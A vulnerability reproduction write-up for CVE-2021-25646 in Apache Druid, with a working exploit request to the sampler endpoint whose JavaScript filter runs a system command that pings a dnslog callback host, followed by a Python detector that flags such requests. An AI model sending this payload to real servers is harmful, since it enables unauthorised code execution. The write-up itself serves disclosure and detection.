Apache Druid sampler Remote code execution vulnerability CVE-2021-25646
Vulnerability Description
Apache Druid is a column-oriented, open-source, distributed data store written in Java, designed to ingest large volumes of event data quickly and serve low-latency queries over it. Apache Druid ships with no authentication or authorization enabled by default, so an attacker who can reach the service can send a specially crafted request and execute arbitrary code with the privileges of the Druid server process. The root cause is that Apache Druid includes code paths that execute user-supplied JavaScript embedded in several kinds of requests.
Vulnerability Impact
Apache Druid < 0.20.1
Environment setup
Docker is used here to build the test environment.
After downloading, change into the distribution\docker directory.
Run docker-compose up -d to start the containers.
Vulnerability reproduction
Verify POC
POST /druid/indexer/v1/sampler
Content-Type: application/json

{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2021-2-1T14:12:24.050Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('ping p3fpw5.dnslog.cn')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}
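As an added defensive example (not part of the original post), the following Python check walks the JSON body of captured requests to the sampler endpoint and flags any JavaScript-typed filter or transform spec, as well as the empty-string key carrying {"enabled": true} that appears in the POC above. The sample requests are constructed for the example; the endpoint path is the one from the POC, and the JavaScript function body in the sample is a harmless placeholder.

```python
import json

# Added example (not from the original post): a log-side check that flags
# Druid sampler requests carrying JavaScript-typed specs, the pattern used
# by the CVE-2021-25646 request shown above.

SAMPLER_PATH = "/druid/indexer/v1/sampler"


def find_javascript_specs(node, path="$"):
    """Recursively collect every object whose "type" is "javascript", and every
    empty-string key whose value sets enabled=true (the per-request override
    seen in the POC). Returns a list of (json_path, reason) pairs."""
    hits = []
    if isinstance(node, dict):
        if str(node.get("type", "")).lower() == "javascript":
            hits.append((path, "javascript-typed spec"))
        override = node.get("")
        if isinstance(override, dict) and override.get("enabled") is True:
            hits.append((path, "empty-key config override with enabled=true"))
        for key, value in node.items():
            hits.extend(find_javascript_specs(value, f"{path}.{key or '<empty>'}"))
    elif isinstance(node, list):
        for i, value in enumerate(node):
            hits.extend(find_javascript_specs(value, f"{path}[{i}]"))
    return hits


def triage_request(method, path, body):
    """Return findings for one captured HTTP request, or [] if nothing stands out."""
    if method.upper() != "POST" or not path.startswith(SAMPLER_PATH):
        return []
    try:
        spec = json.loads(body)
    except ValueError:
        return [("$", "unparseable JSON body sent to sampler endpoint")]
    return find_javascript_specs(spec)


# Constructed sample bodies (not real traffic). SUSPICIOUS mirrors the shape of
# the POC: a javascript filter inside transformSpec plus the "" override; the
# function body here is a harmless placeholder. BENIGN uses a selector filter.
SUSPICIOUS = json.dumps({"type": "index", "spec": {"dataSchema": {"transformSpec": {
    "filter": {"type": "javascript", "dimension": "added",
               "function": "function(value) { return value > 0 }",
               "": {"enabled": True}}}}}})
BENIGN = json.dumps({"type": "index", "spec": {"dataSchema": {"transformSpec": {
    "filter": {"type": "selector", "dimension": "added", "value": "1"}}}}})

if __name__ == "__main__":
    for body in (SUSPICIOUS, BENIGN):
        print(triage_request("POST", SAMPLER_PATH, body))
```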
This post is licensed under CC BY 4.0 by the author.